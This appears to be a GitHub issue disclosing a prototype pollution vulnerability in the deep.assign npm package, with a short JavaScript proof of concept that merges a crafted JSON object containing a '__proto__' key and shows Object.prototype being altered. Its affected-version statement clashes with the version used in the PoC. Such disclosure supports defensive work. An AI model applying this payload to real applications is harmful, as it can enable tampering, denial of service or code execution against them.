Prototype Pollution in deep.assign npm package

✍️ Description
[deep.assign](https://www.npmjs.com/package/deep.assign) npm package is vulnerable to prototype pollution vulnerability prior to version 0.0.0-alpha.0.

🕵️‍♂️ Proof of Concept
[LIVE POC LINK](https://runkit.com/embed/hxpxvkppf5x5)

```
var deepAssign = require("deep.assign@0.0.0-alpha.0")
var obj=JSON.parse('{"__proto__":{"polluted":1}}')
var obj1 = {"red":"apple"}
console.log("Before:"+{}.polluted)
var c=deepAssign.deepAssign(obj1,obj)
console.log("After:"+{}.polluted)
```

💥 Impact
May lead to Information Disclosure/DoS/RCE.

External References for similar vulnerabilities/blogs:
https://medium.com/node-modules/what-is-prototype-pollution-and-why-is-it-such-a-big-deal-2dd8d89a93c
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26707


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Prototype Pollution in deep.assign npm package #1

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development